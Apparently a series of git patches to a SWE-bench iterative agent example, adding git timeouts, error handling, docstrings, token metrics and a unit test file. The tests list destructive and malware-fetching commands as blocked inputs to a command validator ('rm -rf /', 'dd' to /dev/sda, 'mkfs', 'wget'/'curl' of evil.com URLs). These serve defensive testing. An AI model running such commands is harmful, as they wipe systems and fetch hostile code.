+ """ + for pattern, message in DANGEROUS_PATTERNS: + if pattern.search(command): + return False, message + return True, "" + + class IterativeAgent: """Iterative agent that executes commands step-by-step.""" @@ -373,6 +479,11 @@ async def _execute_action(self, response: str) -> str: command = matches[0].strip() + # Validate command for security before execution + is_valid, error_msg = validate_command(command) + if not is_valid: + raise FormatError(f"Command blocked for security: {error_msg}") + # Execute command using asyncio.to_thread to avoid blocking def run_cmd(): """Synchronous command execution function.""" From 75e94e37bbfebba6c658206e2a1bad3b755755b3 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 22:18:50 -0800 Subject: [PATCH 08/22] feat(swe-bench): add timeout and error handling for git operations - Add timeout parameter to clone_repository (default 600s) and checkout_commit (default 120s) to prevent indefinite hangs - Add URL validation for repository URLs - Clean up partial clones on timeout or error - Improve logging for success and failure cases Signed-off-by: Jerry Guan --- .../predict_iterative/tools/git_tool.py | 72 ++++++++++++++++--- 1 file changed, 63 insertions(+), 9 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index cc996bbf0d..830504b513 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -106,17 +106,71 @@ def get_repo_path(workspace_dir: str, repo_url: str, instance_id: str | None = N return Path(workspace_dir) / org_name / repo_name -async def clone_repository(repo_url: str, target_path: Path) -> Repo: - """Clone a repository to the 
specified path.""" +async def clone_repository(repo_url: str, target_path: Path, timeout: int = 600) -> Repo: + """Clone a repository with timeout and error handling. + + Args: + repo_url: URL of the repository to clone. + target_path: Local path to clone into. + timeout: Maximum time in seconds for clone operation. + + Returns: + The cloned Repo object. + + Raises: + ValueError: If repo_url format is invalid. + asyncio.TimeoutError: If clone exceeds timeout. + """ logger.info("Cloning repository %s to %s", repo_url, target_path) - if os.path.exists(target_path): + + # Validate URL format + if not (repo_url.startswith('https://') or repo_url.startswith('git@')): + raise ValueError(f"Invalid repository URL: {repo_url}") + + # Clean existing path + if target_path.exists(): await asyncio.to_thread(shutil.rmtree, target_path) - # Use asyncio.to_thread to avoid blocking the event loop during clone operation - return await asyncio.to_thread(Repo.clone_from, repo_url, target_path) + try: + repo = await asyncio.wait_for( + asyncio.to_thread(Repo.clone_from, repo_url, target_path), + timeout=timeout + ) + logger.info("Successfully cloned %s", repo_url) + return repo + except asyncio.TimeoutError: + logger.error("Clone timed out for %s after %ds", repo_url, timeout) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + except Exception as e: + logger.error("Clone failed for %s: %s", repo_url, e) + if target_path.exists(): + await asyncio.to_thread(shutil.rmtree, target_path) + raise + + +async def checkout_commit(repo: Repo, commit_hash: str, timeout: int = 120): + """Checkout a specific commit with timeout and error handling. -async def checkout_commit(repo: Repo, commit_hash: str): - """Checkout a specific commit in the repository.""" + Args: + repo: The repository object. + commit_hash: The commit hash to checkout. + timeout: Maximum time in seconds for checkout operation. 
+ + Raises: + asyncio.TimeoutError: If checkout exceeds timeout. + """ logger.info("Checking out commit %s", commit_hash) - # Use asyncio.to_thread to avoid blocking the event loop during checkout - await asyncio.to_thread(repo.git.checkout, commit_hash) + try: + await asyncio.wait_for( + asyncio.to_thread(repo.git.checkout, commit_hash), + timeout=timeout + ) + logger.info("Successfully checked out %s", commit_hash) + except asyncio.TimeoutError: + logger.error("Checkout timed out for %s after %ds", commit_hash, timeout) + raise + except Exception as e: + logger.error("Checkout failed for %s: %s", commit_hash, e) + raise From 61b02b255279fc7f38d8e5e1a25f602dd556e7c5 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 22:26:12 -0800 Subject: [PATCH 09/22] fix(swe-bench): remove redundant shutil import in cleanup method Signed-off-by: Jerry Guan --- .../nat_swe_bench/predictors/predict_iterative/tools/git_tool.py | 1 - 1 file changed, 1 deletion(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index 830504b513..e43f5ecdf3 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -68,7 +68,6 @@ async def setup_repository( async def cleanup(self): """Clean up all managed repositories.""" - import shutil for repo_path_str in list(self.active_repos.keys()): repo_path = Path(repo_path_str) if repo_path.exists(): From 26fda75bf8997888bbfc69486a30a0d4d0572795 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Tue, 27 Jan 2026 22:51:11 -0800 Subject: [PATCH 10/22] fix(swe-bench): add specific exception handling for repo setup - Handle GitCommandError with stderr details - Handle OSError for filesystem 
issues - Keep generic Exception as fallback Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/predict_iterative.py | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index c6e2d51ddc..0123b5b0cc 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -33,6 +33,7 @@ from dataclasses import dataclass from pathlib import Path +from git.exc import GitCommandError from langchain_core.messages import AIMessage, HumanMessage, SystemMessage from rich.console import Console @@ -571,9 +572,15 @@ async def predict_fn(self, swebench_input: SWEBenchInput) -> str: })) repo_path = Path(repo_path_str) logger.info("Repository setup at %s", repo_path) + except GitCommandError as e: + logger.error("Git operation failed: %s", e, exc_info=True) + return f"Error: Git operation failed - {e.stderr}" + except OSError as e: + logger.error("Filesystem error: %s", e, exc_info=True) + return f"Error: Workspace setup failed - {str(e)}" except Exception as e: - logger.exception("Failed to setup repository: %s", e) - return f"Error: Failed to setup repository - {str(e)}" + logger.exception("Unexpected error during repo setup: %s", e) + return f"Error: Setup failed - {str(e)}" try: # Get LLM From 03e0b46f2a6189fda1376736af88e9bb2bab851a Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 10:28:48 -0800 Subject: [PATCH 11/22] fix(swe-bench): add error handling for workspace cleanup - Wrap cleanup in try-except to prevent masking original exceptions - Log success/failure for debugging - Don't raise on cleanup failure to allow graceful 
degradation Signed-off-by: Jerry Guan --- .../predictors/predict_iterative/tools/register.py | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index bffdf67b9b..c5ec58f1df 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -14,6 +14,7 @@ # limitations under the License. # Register all the tools needed by the full predictor without loading the dependencies. +import logging import typing from nat.builder.builder import Builder @@ -21,6 +22,8 @@ from nat.cli.register_workflow import register_function from nat.data_models.function import FunctionBaseConfig +logger = logging.getLogger(__name__) + class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): """Configuration for git repository management tool.""" @@ -67,4 +70,9 @@ async def git_operations(args_str: str) -> str: description="Git repository management tool that accepts JSON string arguments") finally: if tool_config.cleanup_on_exit: - await repo_manager.cleanup() + try: + await repo_manager.cleanup() + logger.info("Workspace cleanup completed successfully") + except Exception as e: + logger.error("Workspace cleanup failed: %s", e, exc_info=True) + # Don't raise - allow graceful degradation From 55039a36e6173d339b942907b80752d2e7f1592f Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 10:35:05 -0800 Subject: [PATCH 12/22] docs(swe-bench): add benchmark context for iterative predictor Explain that 70% success rate reflects model capabilities rather than framework innovations, and provide guidance on metrics and harder benchmarks for evaluating framework 
improvements. Signed-off-by: Jerry Guan --- examples/evaluation_and_profiling/swe_bench/README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/examples/evaluation_and_profiling/swe_bench/README.md b/examples/evaluation_and_profiling/swe_bench/README.md index 8118518146..09efbf0d0e 100644 --- a/examples/evaluation_and_profiling/swe_bench/README.md +++ b/examples/evaluation_and_profiling/swe_bench/README.md @@ -161,6 +161,17 @@ These predictors are provided in this NeMo Agent Toolkit example: - `skeleton` - Skeleton code for creating a problem-solving workflow. This code can be copied to create a net-new predictor. See [predict_skeleton.py](src/nat_swe_bench/predictors/predict_skeleton/predict_skeleton.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_skeleton.yml`. - `iterative` - Iterative agent that solves problems by executing bash commands step-by-step, observing results, and generating patches. See [predict_iterative.py](src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_iterative.yml`. +### Benchmark Context (January 2026) + +The iterative predictor achieves 70% success rate on SWE-bench Lite, which primarily reflects the capabilities of modern foundation models (Claude Sonnet 4.5, GPT-5.2) rather than framework-specific innovations. SWE-bench Lite is approaching saturation at 70-80% with simple agent architectures. 
+
+**For evaluating framework improvements beyond task correctness, consider tracking:**
+- **Efficiency metrics:** Tokens consumed, steps taken, cost per solution
+- **Reliability metrics:** Success rate variance over multiple runs
+- **Harder benchmarks:** SWE-bench Verified (currently ~35% SOTA, not saturated) or full SWE-bench dataset (2,294 problems)
+
+This positions the iterative predictor as a reference implementation demonstrating NeMo Agent Toolkit's builder pattern and tool integration capabilities.
+
 ### Adding a net new predictor
 To add a new predictor:
 - Create a new directory in the predictors directory, copy over the contents of [predictors/predict_skeleton](src/nat_swe_bench/predictors/predict_skeleton/). Rename the files and fill in the logic to solve the problem.

From 3f62472d20e49ea481c913b9fb70d854b93c4a64 Mon Sep 17 00:00:00 2001
From: Jerry Guan
Date: Wed, 28 Jan 2026 10:39:38 -0800
Subject: [PATCH 13/22] docs(swe-bench): clarify step_limit override in config

Signed-off-by: Jerry Guan
---
 .../swe_bench/src/nat_swe_bench/configs/config_iterative.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml
index 0755550c6c..71101f98fa 100644
--- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml
+++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml
@@ -35,7 +35,7 @@ workflow:
   predictor:
     _type: iterative
     llm_name: "openai_llm" # "nim_llm" or "claude_sonnet_llm" or "openai_llm"
-    step_limit: 100
+    step_limit: 100 # Overrides default (250)
     timeout: 60
 
 functions:

From 0c4ded9ebadb475d0cd4723c79b362476d497b7f Mon Sep 17 00:00:00 2001
From: Jerry Guan
Date: Wed, 28 Jan 2026 11:22:44 -0800
Subject: [PATCH 14/22] docs(swe-bench): add complete docstrings for public methods

Add 
Args/Returns/Raises documentation to: - predict_iterative.py: add_message, run, _query_llm, _execute_action, predict_fn, _build_task_description, _build_prompts - git_tool.py: RepoManager.__init__, setup_repository, cleanup - register.py: git_repo_tool, git_operations Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 75 ++++++++++++++++--- .../predict_iterative/tools/git_tool.py | 22 +++++- .../predict_iterative/tools/register.py | 26 ++++++- 3 files changed, 109 insertions(+), 14 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index 0123b5b0cc..ebb952c72b 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -217,7 +217,16 @@ def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig): self.n_steps = 0 def add_message(self, role: str, content: str): - """Add a message to the conversation and print it for debugging.""" + """Add a message to the conversation and print it for debugging. + + Args: + role: The role of the message sender. Must be one of: + "system", "user", "human", "assistant", or "ai". + content: The message content to add. + + Raises: + ValueError: If role is not a recognized value. + """ if role == "system": msg = SystemMessage(content=content) self.messages.append(msg) @@ -238,10 +247,13 @@ def add_message(self, role: str, content: str): def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: """Build system and instance prompts customized for SWE-bench. - + Args: - task: The task description/PR description - repo_path: Path to the repository being worked on + task: The task description/PR description. 
+ repo_path: Path to the repository being worked on. + + Returns: + A tuple of (system_prompt, instance_prompt) strings. """ # Convert Path to string for template usage repo_path_str = str(repo_path) @@ -420,7 +432,18 @@ def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: return system_template, instance_template async def run(self, task: str) -> tuple[str, str]: - """Run the iterative agent loop until completion.""" + """Run the iterative agent loop until completion. + + Executes commands step-by-step, observing results and adjusting strategy + until the task is completed or limits are exceeded. + + Args: + task: The task description to solve. + + Returns: + A tuple of (exit_status, result) where exit_status is either + "Submitted" or "LimitsExceeded", and result is the patch or error message. + """ system_template, instance_template = self._build_prompts(task, self.repo_path) self.messages = [] @@ -458,7 +481,14 @@ async def run(self, task: str) -> tuple[str, str]: return type(e).__name__, str(e) async def _query_llm(self) -> str: - """Query LLM and return response content.""" + """Query LLM and return response content. + + Returns: + The LLM response content as a string. + + Raises: + NonTerminatingException: If the LLM invocation fails. + """ try: response = await self.llm.ainvoke(self.messages) content = response.content if hasattr(response, 'content') else str(response) @@ -470,7 +500,20 @@ async def _query_llm(self) -> str: raise NonTerminatingException(f"LLM call failed: {str(e)}") async def _execute_action(self, response: str) -> str: - """Parse action from response and execute it asynchronously.""" + """Parse action from response and execute it asynchronously. + + Args: + response: The LLM response containing a bash code block. + + Returns: + The command output including returncode. + + Raises: + FormatError: If the response doesn't contain exactly one bash block, + or if the command fails security validation. 
+ ExecutionTimeoutError: If the command execution times out. + NonTerminatingException: If command execution fails unexpectedly. + """ # Extract bash command from response action_regex = r"```bash\s*\n(.*?)\n```" matches = re.findall(action_regex, response, re.DOTALL) @@ -548,7 +591,14 @@ def __init__(self, config: SweBenchWorkflowConfig, builder: Builder): self.git_tool = None async def predict_fn(self, swebench_input: SWEBenchInput) -> str: - """Generate patch using iterative agent approach.""" + """Generate patch using iterative agent approach. + + Args: + swebench_input: The SWE-bench problem instance to solve. + + Returns: + The generated patch as a string, or an error message if failed. + """ logger.info("Processing instance %s with iterative agent", swebench_input.instance_id) # Setup repository @@ -614,7 +664,14 @@ async def predict_fn(self, swebench_input: SWEBenchInput) -> str: return f"Error: {str(e)}" def _build_task_description(self, swebench_input: SWEBenchInput) -> str: - """Build task description from SWE-bench input.""" + """Build task description from SWE-bench input. + + Args: + swebench_input: The SWE-bench problem instance. + + Returns: + Combined task description with problem statement and hints. 
+ """ parts = [swebench_input.problem_statement] if swebench_input.hints_text: parts.append(f"\nAdditional Context:\n{swebench_input.hints_text}") diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py index e43f5ecdf3..d6dd49b28f 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -35,8 +35,14 @@ class RepoContext: class RepoManager: + """Manages git repository cloning and cleanup for SWE-bench instances.""" def __init__(self, workspace_dir: str): + """Initialize the repository manager. + + Args: + workspace_dir: Base directory for cloning repositories. + """ self.workspace = Path(workspace_dir) self.workspace.mkdir(parents=True, exist_ok=True) self.active_repos = {} @@ -47,10 +53,17 @@ async def setup_repository( """Setup a repository at a specific commit. Args: - repo_url: URL of the repository to clone - base_commit: Commit hash to checkout + repo_url: URL of the repository to clone. + base_commit: Commit hash to checkout. instance_id: Optional instance ID for workspace isolation. When provided, each instance gets its own clean workspace directory. + + Returns: + RepoContext containing the repository path and Repo object. + + Raises: + ValueError: If the repository URL is invalid. + asyncio.TimeoutError: If clone or checkout times out. """ repo_path = get_repo_path(str(self.workspace), repo_url, instance_id) @@ -67,7 +80,10 @@ async def setup_repository( return context async def cleanup(self): - """Clean up all managed repositories.""" + """Clean up all managed repositories. + + Removes all cloned repository directories and clears the active repos cache. 
+ """ for repo_path_str in list(self.active_repos.keys()): repo_path = Path(repo_path_str) if repo_path.exists(): diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py index c5ec58f1df..d0facf41c4 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -34,14 +34,36 @@ class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): @register_function(config_type=GitRepoToolConfig) async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): - """Git repository management tool for SWE Bench.""" + """Git repository management tool for SWE Bench. + + Args: + tool_config: Configuration for the git tool. + builder: NAT builder instance. + + Yields: + FunctionInfo for the git_operations function. + """ import json from .git_tool import RepoManager repo_manager = RepoManager(tool_config.workspace_dir) - # Simple async function that accepts a JSON string async def git_operations(args_str: str) -> str: + """Perform git operations based on JSON input. + + Args: + args_str: JSON string with 'operation' and operation-specific parameters. + Supported operations: + - setup: requires 'repo_url', 'base_commit', optional 'instance_id' + - cleanup: no additional parameters + + Returns: + For 'setup': the repository path as a string. + For 'cleanup': "Cleanup complete". + + Raises: + ValueError: If JSON is invalid or operation is unknown. 
+ """ try: args = json.loads(args_str) except json.JSONDecodeError as e: From df324e0fca25d911af67759d95ff2a45f0f25750 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 12:43:51 -0800 Subject: [PATCH 15/22] feat(swe-bench): add simple metrics logging for iterative agent Track steps, tokens, and time in IterativeAgent: - Add total_input_tokens and total_output_tokens counters - Extract token usage from LLM response metadata (OpenAI/Anthropic) - Log summary at agent completion with steps, tokens, time, status Signed-off-by: Jerry Guan --- .../predict_iterative/predict_iterative.py | 38 +++++++++++++++---- 1 file changed, 31 insertions(+), 7 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py index ebb952c72b..ad59d47f3d 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -30,6 +30,7 @@ import logging import re import subprocess +import time from dataclasses import dataclass from pathlib import Path @@ -215,6 +216,8 @@ def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig): self.config = config self.messages: list = [] self.n_steps = 0 + self.total_input_tokens = 0 + self.total_output_tokens = 0 def add_message(self, role: str, content: str): """Add a message to the conversation and print it for debugging. 
@@ -450,6 +453,8 @@ async def run(self, task: str) -> tuple[str, str]: self.add_message("system", system_template) self.add_message("user", instance_template) + start_time = time.perf_counter() + while True: try: # Check limits @@ -457,7 +462,7 @@ async def run(self, task: str) -> tuple[str, str]: raise LimitsExceeded(f"Reached step limit: {self.config.step_limit}") self.n_steps += 1 - + response = await self._query_llm() observation = await self._execute_action(response) @@ -476,9 +481,16 @@ async def run(self, task: str) -> tuple[str, str]: # Recoverable errors: add error message and continue self.add_message("user", str(e)) except TerminatingException as e: - # Terminal errors: add error message and return + # Log summary and return + elapsed = time.perf_counter() - start_time + exit_status = type(e).__name__ + logger.info( + "\nAgent finished: steps=%d, tokens=%d/%d, time=%.1fs, status=%s", + self.n_steps, self.total_input_tokens, self.total_output_tokens, + elapsed, exit_status + ) self.add_message("user", str(e)) - return type(e).__name__, str(e) + return exit_status, str(e) async def _query_llm(self) -> str: """Query LLM and return response content. @@ -490,13 +502,25 @@ async def _query_llm(self) -> str: NonTerminatingException: If the LLM invocation fails. 
""" try: - response = await self.llm.ainvoke(self.messages) + response = await self.llm.ainvoke(self.messages) content = response.content if hasattr(response, 'content') else str(response) self.add_message("assistant", content) + + # Extract and accumulate token usage from response metadata + if hasattr(response, 'response_metadata'): + metadata = response.response_metadata + # OpenAI format + if 'token_usage' in metadata: + self.total_input_tokens += metadata['token_usage'].get('prompt_tokens', 0) + self.total_output_tokens += metadata['token_usage'].get('completion_tokens', 0) + # Anthropic format + elif 'usage' in metadata: + self.total_input_tokens += metadata['usage'].get('input_tokens', 0) + self.total_output_tokens += metadata['usage'].get('output_tokens', 0) + return content except Exception as e: logger.error("LLM invocation failed: %s", e, exc_info=True) - # recoverable error, let the agent continue raise NonTerminatingException(f"LLM call failed: {str(e)}") async def _execute_action(self, response: str) -> str: @@ -545,10 +569,10 @@ def run_cmd(): try: result = await asyncio.to_thread(run_cmd) - + # stderr is automatically redirected to stdout via stderr=subprocess.STDOUT output = result.stdout if result.stdout else "" - + # Include returncode in the output so agent know action success or fail output = f"{result.returncode}\n{output}" From 7ec5f7882a932afec8029f4999476e6f8134e073 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 28 Jan 2026 12:54:40 -0800 Subject: [PATCH 16/22] test(swe-bench): add comprehensive tests for iterative predictor Add 51 unit tests covering: - Command validation security checks (safe/dangerous commands) - Basic agent flow (submission, token accumulation, step limits) - Format error recovery (no bash block, multiple blocks, dangerous commands) - Timeout handling (command timeout, timeout message content) - Workspace isolation (instance_id path separation) - Git operations (clone, checkout, URL validation, timeout) - Resource 
cleanup (repo cleanup, missing directory handling) - Integration test with mocked LLM Coverage: git_tool.py 82%, predict_iterative.py 73% (SweBenchPredictor.predict_fn requires full NAT environment) Signed-off-by: Jerry Guan --- .../tests/test_iterative_predictor.py | 700 ++++++++++++++++++ 1 file changed, 700 insertions(+) create mode 100644 examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py diff --git a/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py new file mode 100644 index 0000000000..54d634e162 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/tests/test_iterative_predictor.py @@ -0,0 +1,700 @@ +# SPDX-FileCopyrightText: Copyright (c) 2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +"""Unit tests for the iterative predictor.""" + +import asyncio +import subprocess +from pathlib import Path +from unittest.mock import AsyncMock, MagicMock, patch + +import pytest + +from nat_swe_bench.predictors.predict_iterative.predict_iterative import ( + DANGEROUS_PATTERNS, + ExecutionTimeoutError, + FormatError, + IterativeAgent, + IterativeAgentConfig, + LimitsExceeded, + Submitted, + validate_command, +) + + +# ============================================================================= +# Fixtures +# ============================================================================= + +@pytest.fixture +def mock_llm(): + """Create a mock LLM that returns configurable responses.""" + llm = AsyncMock() + return llm + + +@pytest.fixture +def agent_config(): + """Create a default agent configuration for testing.""" + return IterativeAgentConfig( + step_limit=10, + timeout=5, + max_output_length=1000 + ) + + +@pytest.fixture +def temp_repo_path(tmp_path): + """Create a temporary directory to simulate a repository.""" + repo_path = tmp_path / "test_repo" + repo_path.mkdir() + return repo_path + + +@pytest.fixture +def agent(mock_llm, temp_repo_path, agent_config): + """Create an IterativeAgent instance with mocked dependencies.""" + return IterativeAgent(mock_llm, temp_repo_path, agent_config) + + +def create_llm_response(content: str, input_tokens: int = 100, output_tokens: int = 50): + """Helper to create a mock LLM response with token usage.""" + response = MagicMock() + response.content = content + response.response_metadata = { + 'token_usage': { + 'prompt_tokens': input_tokens, + 'completion_tokens': output_tokens + } + } + return response + + +# ============================================================================= +# test_command_validation - Security validation tests +# ============================================================================= + +class TestCommandValidation: + """Tests for the command validation security checks.""" + + 
@pytest.mark.parametrize("command", [ + "ls -la", + "cat file.txt", + "grep -r 'pattern' .", + "python script.py", + "make test", + "npm install", + "git status", + "echo 'hello' > output.txt", + "rm -rf ./temp_dir", # Relative path is ok + "rm file.txt", + ]) + def test_safe_commands_allowed(self, command): + """Test that safe commands pass validation.""" + is_valid, error_msg = validate_command(command) + assert is_valid, f"Command '{command}' should be allowed but got: {error_msg}" + + @pytest.mark.parametrize("command,expected_error", [ + ("rm -rf /", "root or home"), + ("rm -rf ~", "root or home"), + ("rm -rf / ", "root or home"), # With trailing space + ("rm -rf ..", "parent directory"), + ("rm -rf *", "Wildcard"), + ("sudo apt-get install", "sudo"), + ("echo test > /dev/sda", "device files"), + ("mkfs.ext4 /dev/sda1", "Formatting"), + ("fdisk /dev/sda", "partitioning"), + ("dd if=/dev/zero of=/dev/sda", "dd"), + ("wget http://evil.com/script.sh", "wget"), + ("curl https://evil.com/malware", "curl"), + ("chmod 777 /etc/passwd", "777"), + ("chown root file.txt", "root"), + ]) + def test_dangerous_commands_blocked(self, command, expected_error): + """Test that dangerous commands are blocked with appropriate error messages.""" + is_valid, error_msg = validate_command(command) + assert not is_valid, f"Command '{command}' should be blocked" + assert expected_error.lower() in error_msg.lower(), \ + f"Error message should contain '{expected_error}', got: {error_msg}" + + +# ============================================================================= +# test_iterative_agent_basic_flow - End-to-end execution +# ============================================================================= + +class TestIterativeAgentBasicFlow: + """Tests for the basic agent execution flow.""" + + @pytest.mark.asyncio + async def test_basic_flow_to_submission(self, agent, mock_llm): + """Test that agent completes a basic flow and submits correctly.""" + # Setup: LLM returns a sequence 
of responses ending with submission + responses = [ + create_llm_response("THOUGHT: Let me check the files.\n\n```bash\nls -la\n```"), + create_llm_response("THOUGHT: Now I'll submit.\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```"), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + # Mock subprocess to return success + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + # First command: ls -la + ls_result = MagicMock() + ls_result.returncode = 0 + ls_result.stdout = "file1.py\nfile2.py\n" + + # Second command: submission + submit_result = MagicMock() + submit_result.returncode = 0 + submit_result.stdout = "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\ndiff --git a/file.py b/file.py\n+fixed line" + + mock_thread.side_effect = [ls_result, submit_result] + + exit_status, result = await agent.run("Fix the bug in file.py") + + assert exit_status == "Submitted" + assert "diff" in result or "COMPLETE_TASK" in result + assert agent.n_steps == 2 + + @pytest.mark.asyncio + async def test_token_accumulation(self, agent, mock_llm): + """Test that tokens are correctly accumulated across steps.""" + responses = [ + create_llm_response("THOUGHT: Step 1\n\n```bash\nls\n```", input_tokens=100, output_tokens=50), + create_llm_response("THOUGHT: Submit\n\n```bash\necho COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached\n```", input_tokens=200, output_tokens=100), + ] + mock_llm.ainvoke = AsyncMock(side_effect=responses) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + result1 = MagicMock(returncode=0, stdout="output") + result2 = MagicMock(returncode=0, stdout="COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT\npatch") + mock_thread.side_effect = [result1, result2] + + await agent.run("Test task") + + assert agent.total_input_tokens == 300 # 100 + 200 + assert agent.total_output_tokens == 150 # 50 
+ 100 + + @pytest.mark.asyncio + async def test_step_limit_exceeded(self, mock_llm, temp_repo_path): + """Test that agent stops when step limit is reached.""" + config = IterativeAgentConfig(step_limit=2, timeout=5) + agent = IterativeAgent(mock_llm, temp_repo_path, config) + + # LLM always returns a valid command but never submits + mock_llm.ainvoke = AsyncMock( + return_value=create_llm_response("THOUGHT: Working\n\n```bash\nls\n```") + ) + + with patch('nat_swe_bench.predictors.predict_iterative.predict_iterative.asyncio.to_thread') as mock_thread: + mock_thread.return_value = MagicMock(returncode=0, stdout="output") + + exit_status, result = await agent.run("Task") + + assert exit_status == "LimitsExceeded" + assert "step limit" in result.lower() + + +# ============================================================================= +# test_format_error_recovery - LLM output validation +# ============================================================================= + +class TestFormatErrorRecovery: + """Tests for handling malformed LLM responses.""" + + @pytest.mark.asyncio + async def test_recovery_from_no_bash_block(self, agent, mock_llm): + """Test that agent recovers when LLM doesn't include a bash block.""" + responses = [ + # First response: no 